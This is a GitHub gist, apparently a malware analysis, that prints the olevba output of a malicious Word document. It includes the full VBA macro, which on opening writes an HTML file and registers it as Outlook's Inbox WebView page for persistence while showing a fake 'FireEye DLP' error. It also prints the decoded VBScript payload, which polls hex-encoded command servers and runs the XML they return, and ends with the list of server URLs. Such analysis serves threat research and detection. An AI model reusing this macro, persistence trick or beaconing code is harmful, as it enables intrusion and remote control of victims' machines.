Created
October 1, 2020 01:41
-
-
Save JohnLaTwC/6cf34541ba597c6c28b2465de4ffd32e to your computer and use it in GitHub Desktop.
A very interesting DOCX no?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: 38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1 | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisDocument.cls | |
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
Private Declare PtrSafe Function ExpandString Lib "kernel32" Alias "ExpandEnvironmentStringsA" (ByVal lpSrc As String, ByVal lpDst As String, ByVal nSize As Long) As Long | |
Sub Document_Open() | |
On Error Resume Next | |
Set ax = CreateObject("Microsoft.Windows.ActCtx") | |
m = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?><assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">" | |
m = m & "<assemblyIdentity name=""Microsoft.VisualBasic"" version=""10.0.0.0"" publicKeyToken=""B03F5F7F11D50A3A"" />" | |
m = m & "<clrClass clsid=""{E27D25D3-14B1-3960-8D23-A9FAB9BF32BC}"" progid=""Microsoft.VisualBasic.Devices.Computer"" threadingModel=""Both"" name=""Microsoft.VisualBasic.Devices.Computer"" runtimeVersion=""v4.0.30319"" /></assembly>" | |
ax.ManifestText = m | |
Set c = ax.CreateObject("Microsoft.VisualBasic.Devices.Computer") | |
Set k = c.Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Office\\" + Application.Version + "\Outlook\WebView\Inbox") | |
Dim i As String, o As String, rs As Long | |
i = R("FL") | |
rs = ExpandString(i, o, rs) | |
o = Space$(rs) | |
rs = ExpandString(i, o, rs) | |
k.SetValue "URL", "file:///" & o | |
WB o, DH(R("Hyperlink Base")) | |
Set oh = CreateObject("MSXML2.XMLHTTP") | |
oh.Open "GET", R("U"), False | |
oh.Send | |
Dim Msg, Style, Title, Help, Ctxt, Response, MyString | |
Msg = "Error: FireEye DLP parsing failed." | |
Style = vbOKOnly | |
Title = "FireEye DLP" | |
Help = "DEMO.HLP" | |
Ctxt = 1000 | |
Response = MsgBox(Msg, Style, Title, Help, Ctxt) | |
ActiveDocument.Bookmarks("Page1").Range.Font.Hidden = False | |
End Sub | |
Private Sub Document_Close() | |
On Error Resume Next | |
ActiveDocument.Bookmarks("Page1").Range.Font.Hidden = True | |
Documents.Save NoPrompt:=True | |
End Sub | |
Private Sub WB(file, bytes) | |
On Error Resume Next | |
Set s = CreateObject("ADODB.Stream") | |
s.Type = 1 | |
s.Open | |
s.Write bytes | |
s.SaveToFile file, 2 | |
End Sub | |
Private Function DH(hex) | |
On Error Resume Next | |
Set EL = CreateObject("Microsoft.XMLDOM").createElement("tmp") | |
EL.dataType = "bin.hex" | |
EL.Text = hex | |
DH = EL.nodeTypedValue | |
End Function | |
Function R(sPropName As String) As Variant | |
On Error Resume Next | |
Dim bCustom As Boolean | |
Dim sValue As String | |
On Error GoTo ErrHandlerRead | |
sValue = ActiveDocument.BuiltInDocumentProperties(sPropName).Value | |
R = sValue | |
Exit Function | |
ContinueCustom: | |
bCustom = True | |
Custom: | |
sValue = ActiveDocument.CustomDocumentProperties(sPropName).Value | |
R = sValue | |
Exit Function | |
ErrHandlerRead: | |
Err.Clear | |
If Not bCustom Then | |
Resume ContinueCustom | |
Else | |
R = "" | |
Exit Function | |
End If | |
End Function | |
############################################################################ | |
## in docProps/app.xml [tag={...}HyperlinkBase, text below: | |
## 3c68746d6c3e0a3c686561643e0a3c7469746c653e496e626f783c2f7469746c653e0a0a3c7363726970742069643d224576656e7448616e646c65727322206c616e67756167653d227662736372697074223e0a0a44696d20746d2c206964782c20646d2c2066742c20746b2c2065740a0a6574203d20313630313432383133350a746b203d20223938495445554644220a6674203d203330303030300a646d203d20417272617928223638303022262237343022262230373430303730303022262237333030332226226122262230222622303222262266302226223032662226223030372226223530303733222622303036343022262230362226223122262230222622303264302226223037303030366630303732303037222622343022262230222622363130222622303622262263303032653030222622363530303722262233222622303022262237322226223030363930303265303036332226223030366630303622262264303032222622663022262230362226223930302226223665302226223036222622343022262230363530222622303722262238222622302226223032652226223030373030303638303037303022262230222c2236222622383030222622373430303722262234222622302226223037222622303030373330303361302226223032663030222622326630303663302226223036393022262230363230222622302226223732302226223022262236312226223030373230303739303022262232653030366630222622303732303022262236222622353030362226223930303622262263303036633030222622373930303265303022262236333030362226226630303622262264302226223032663030362226223930303622262265303036342226223030222622363530303722262238302226223032222622653030372226223022262230222622303638303037303030222622222c22363830222622303734303037222622343030373030302226223733222622303033613030322226226630303266222622303036642226223030373930222622302226223638303037323022262230222622372226223030303622262263222622303036222622313022262230222622366522262230222622303265303036333030366630222622302226223664222622303032663022262230363930303665302226223036343030363530303738222622302226223032222622652226223030372226223022262230303622262238302226223037303030222c22363830302226223734302226223037343030373030303722262233303022262233613030326630303222262266303022262237222622303030366630222622302226223633222622302226223022262232222622653030363630303734303037303030326430222622303622262265222622303036222622313030333230302226223265303036323030363122262230303722262239303036353030222622373230303222262265222622303036333030222622366630303664303032222622663030363930222622303622262265302226223022262236343030363530302226223738302226223032653022262230373030303638222622303022262237303030222c22363830303722262234222622303037343030222622373030303722262233303033222622613030326630303266303022262237222622333022262230363522262230222622303732303037363030362226223930222622303622262233303036222622352226223030372226223330303265303036633030222622373922262230303732302226223036222622393022262230222622372226223330303265303022262236333022262230222622366630222622303664303032663022262230362226223930222622303665303036343030362226223530222622303738303022262232653030373022262230302226223622262238303037303030222c223638303037343030372226223430302226223722262230303037333022262230336122262230222622303266303032663030372226226130303322262232222622302226223022262232652226223030222622362226223330303722262233302226223032652226223030366522262230303736303022262236393030362226223422262230303639222622303036312226223030362226223730303732222622302226223036392226223030363430303265303022262236653030222622362226223530302226223734222622303032663030363930303665303036222622343022262230363530302226223738303022262232653030373030303638303037303022262230222c22363830303734302226223037343030222622372226223030302226223733222622303022262233613022262230222622326630303266303036343030362226223530303736303037373022262230362226223530222622303622262232303022262232652226223022262230363130303733222622302226223036332226223022262230222622363322262230303222262265303022262236642226223022262230363522262230222622303266303022262236393022262230366522262230303634302226223036353030373830303222262265303037303030363830222622302226223730222622303022290a0a46756e6374696f6e2044482868290a202020204f6e204572726f7220526573756d65204e6578740a2020202053657420454c203d205669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e4372656174654f626a65637428224d6963726f736f66742e584d4c444f4d22292e637265617465456c656d656e742822746d7022290a20202020454c2e6461746154797065203d202262696e2e686578220a20202020454c2e54657874203d20680a202020204448203d204353747228454c2e6e6f6465547970656456616c7565290a456e642046756e6374696f6e0a0a537562205428290a094f6e204572726f7220526573756d65204e6578740a0977696e646f772e636c65617254696d656f757428746d290a0a095365742064203d205669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e4372656174654f626a65637428224d53584d4c322e444f4d446f63756d656e7422290a0953657420686f203d205669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e4372656174654f626a65637428224d53584d4c322e584d4c4854545022290a0a20202020686f2e4f70656e2022474554222c2028444828646d286964782929202620223f746f6b656e3d22202620746b20262022267822292c2046616c73650a20202020686f2e53656e640a20202020642e4c6f6164584d4c20686f2e726573706f6e7365546578740a20202020642e7472616e73666f726d4e6f646520640a20202020496620642e70617273654572726f722e6572726f72436f6465203d2030205468656e0a202020200945786974205375620a20202020456e642049660a0a20202020496620696478203c2055426f756e6428646d29205468656e0a2020202009696478203d20696478202b20310a2020202009746d203d2077696e646f772e73657454696d656f7574282254222c2066742c2022564253637269707422290a20202020456e642049660a456e6420537562090a0a5375622057696e646f775f4f6e4c6f616428290a094f6e204572726f7220526573756d65204e6578740a0a09496620284461746544696666282273222c202230312f30312f313937302030303a30303a3030222c204e6f7729203e20657429205468656e0a0909536574206178203d205669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e4372656174654f626a65637428224d6963726f736f66742e57696e646f77732e41637443747822290a0a09096d203d20223c3f786d6c2076657273696f6e3d2222312e30222220656e636f64696e673d22225554462d31362222207374616e64616c6f6e653d222279657322223f3e3c617373656d626c7920786d6c6e733d222275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e76312222206d616e696665737456657273696f6e3d2222312e3022223e220a09096d203d206d202620223c617373656d626c794964656e74697479206e616d653d22224d6963726f736f66742e56697375616c426173696322222076657273696f6e3d222231302e302e302e302222207075626c69634b6579546f6b656e3d2222423033463546374631314435304133412222202f3e220a09096d203d206d202620223c636c72436c61737320636c7369643d22227b45323744323544332d313442312d333936302d384432332d4139464142394246333242437d22222070726f6769643d22224d6963726f736f66742e56697375616c42617369632e446576696365732e436f6d7075746572222220746872656164696e674d6f64656c3d2222426f74682222206e616d653d22224d6963726f736f66742e56697375616c42617369632e446576696365732e436f6d707574657222222072756e74696d6556657273696f6e3d222276342e302e33303331392222202f3e3c2f617373656d626c793e220a090961782e4d616e696665737454657874203d206d0a0a09095365742063203d2061782e4372656174654f626a65637428224d6963726f736f66742e56697375616c42617369632e446576696365732e436f6d707574657222290a0909536574206b203d20632e52656769737472792e43757272656e74557365722e4372656174655375624b65792822536f6674776172655c4d6963726f736f66745c4f66666963655c22202b204d6964285669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e56657273696f6e2c312c3429202b2020225c4f75746c6f6f6b5c576562566965775c496e626f7822290a090944696d20763a2076203d206b2e47657456616c7565282255524c22290a09096b2e44656c65746556616c7565202255524c220a09095669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e4372656174654f626a6563742822536372697074696e672e46696c6553797374656d4f626a65637422292e44656c65746546696c65284d696428762c203929290a090945786974205375620a09456e642049660a0a09746d203d2077696e646f772e73657454696d656f7574282254222c20353030302c2022564253637269707422290a456e64205375620a0a3c2f7363726970743e0a0a3c2f686561643e0a3c626f64793e0a3c6f626a65637420636c61737369643d22636c7369643a30303036463036332d303030302d303030302d433030302d303030303030303030303436222069643d225669657743746c312220646174613d22222077696474683d223130302522206865696768743d2231303025223e0a093c706172616d206e616d653d224e616d657370616365222076616c75653d224d415049223e0a3c2f6f626a6563743e0a3c2f626f64793e0a3c2f68746d6c3e | |
################################################################################ | |
<html> | |
<head> | |
<title>Inbox</title> | |
<script id="EventHandlers" language="vbscript"> | |
Dim tm, idx, dm, ft, tk, et | |
et = 1601428135 | |
tk = "98ITEUFD" | |
ft = 300000 | |
dm = Array("6800"&"740"&"074007000"&"73003"&"a"&"0"&"02"&"f0"&"02f"&"007"&"50073"&"00640"&"06"&"1"&"0"&"02d0"&"070006f0072007"&"40"&"0"&"610"&"06"&"c002e00"&"65007"&"3"&"00"&"72"&"0069002e0063"&"006f006"&"d002"&"f0"&"06"&"900"&"6e0"&"06"&"40"&"0650"&"07"&"8"&"0"&"02e"&"0070006800700"&"0","6"&"800"&"74007"&"4"&"0"&"07"&"00073003a0"&"02f00"&"2f006c0"&"0690"&"0620"&"0"&"720"&"0"&"61"&"0072007900"&"2e006f0"&"07200"&"6"&"5006"&"9006"&"c006c00"&"79002e00"&"63006"&"f006"&"d0"&"02f006"&"9006"&"e0064"&"00"&"65007"&"80"&"02"&"e007"&"0"&"0"&"068007000"&"","680"&"074007"&"4007000"&"73"&"003a002"&"f002f"&"006d"&"00790"&"0"&"6800720"&"0"&"7"&"0006"&"c"&"006"&"10"&"0"&"6e"&"0"&"02e0063006f0"&"0"&"6d"&"002f0"&"069006e0"&"06400650078"&"0"&"02"&"e"&"007"&"0"&"006"&"80"&"07000","6800"&"740"&"0740070007"&"300"&"3a002f002"&"f00"&"7"&"0006f0"&"0"&"63"&"0"&"0"&"2"&"e006600740070002d0"&"06"&"e"&"006"&"1003200"&"2e00620061"&"007"&"9006500"&"72002"&"e"&"006300"&"6f006d002"&"f00690"&"06"&"e0"&"0"&"64006500"&"780"&"02e0"&"0700068"&"00"&"7000","68007"&"4"&"007400"&"70007"&"3003"&"a002f002f00"&"7"&"30"&"065"&"0"&"0720076006"&"90"&"06"&"3006"&"5"&"007"&"3002e006c00"&"79"&"00720"&"06"&"90"&"0"&"7"&"3002e00"&"630"&"0"&"6f0"&"06d002f0"&"06"&"90"&"06e0064006"&"50"&"07800"&"2e0070"&"00"&"6"&"8007000","680074007"&"400"&"7"&"000730"&"03a"&"0"&"02f002f007"&"a003"&"2"&"0"&"0"&"2e"&"00"&"6"&"3007"&"30"&"02e"&"006e"&"007600"&"69006"&"4"&"0069"&"0061"&"006"&"70072"&"0"&"069"&"0064002e00"&"6e00"&"6"&"500"&"74"&"002f0069006e006"&"40"&"06500"&"7800"&"2e0070006800700"&"0","6800740"&"07400"&"7"&"000"&"73"&"00"&"3a0"&"0"&"2f002f0064006"&"5007600770"&"06"&"50"&"06"&"200"&"2e"&"0"&"0610073"&"0"&"063"&"0"&"0"&"63"&"002"&"e00"&"6d"&"0"&"065"&"0"&"02f00"&"690"&"06e"&"00640"&"0650078002"&"e007000680"&"0"&"70"&"00") | |
Function DH(h) | |
On Error Resume Next | |
Set EL = ViewCtl1.OutlookApplication.CreateObject("Microsoft.XMLDOM").createElement("tmp") | |
EL.dataType = "bin.hex" | |
EL.Text = h | |
DH = CStr(EL.nodeTypedValue) | |
End Function | |
Sub T() | |
On Error Resume Next | |
window.clearTimeout(tm) | |
Set d = ViewCtl1.OutlookApplication.CreateObject("MSXML2.DOMDocument") | |
Set ho = ViewCtl1.OutlookApplication.CreateObject("MSXML2.XMLHTTP") | |
ho.Open "GET", (DH(dm(idx)) & "?token=" & tk & "&x"), False | |
ho.Send | |
d.LoadXML ho.responseText | |
d.transformNode d | |
If d.parseError.errorCode = 0 Then | |
Exit Sub | |
End If | |
If idx < UBound(dm) Then | |
idx = idx + 1 | |
tm = window.setTimeout("T", ft, "VBScript") | |
End If | |
End Sub | |
Sub Window_OnLoad() | |
On Error Resume Next | |
If (DateDiff("s", "01/01/1970 00:00:00", Now) > et) Then | |
Set ax = ViewCtl1.OutlookApplication.CreateObject("Microsoft.Windows.ActCtx") | |
m = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?><assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">" | |
m = m & "<assemblyIdentity name=""Microsoft.VisualBasic"" version=""10.0.0.0"" publicKeyToken=""B03F5F7F11D50A3A"" />" | |
m = m & "<clrClass clsid=""{E27D25D3-14B1-3960-8D23-A9FAB9BF32BC}"" progid=""Microsoft.VisualBasic.Devices.Computer"" threadingModel=""Both"" name=""Microsoft.VisualBasic.Devices.Computer"" runtimeVersion=""v4.0.30319"" /></assembly>" | |
ax.ManifestText = m | |
Set c = ax.CreateObject("Microsoft.VisualBasic.Devices.Computer") | |
Set k = c.Registry.CurrentUser.CreateSubKey("Software\Microsoft\Office\" + Mid(ViewCtl1.OutlookApplication.Version,1,4) + "\Outlook\WebView\Inbox") | |
Dim v: v = k.GetValue("URL") | |
k.DeleteValue "URL" | |
ViewCtl1.OutlookApplication.CreateObject("Scripting.FileSystemObject").DeleteFile(Mid(v, 9)) | |
Exit Sub | |
End If | |
tm = window.setTimeout("T", 5000, "VBScript") | |
End Sub | |
</script> | |
</head> | |
<body> | |
<object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"> | |
<param name="Namespace" value="MAPI"> | |
</object> | |
</body> | |
</html> | |
############################################################################### | |
https://usda-portal.esri.com/index.php | |
https://library.oreilly.com/index.php | |
https://myhrplan.com/index.php | |
https://poc.ftp-na2.bayer.com/index.php | |
https://services.lyris.com/index.php | |
https://z2.cs.nvidiagrid.net/index.php | |
https://devweb.ascc.me/index.php |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment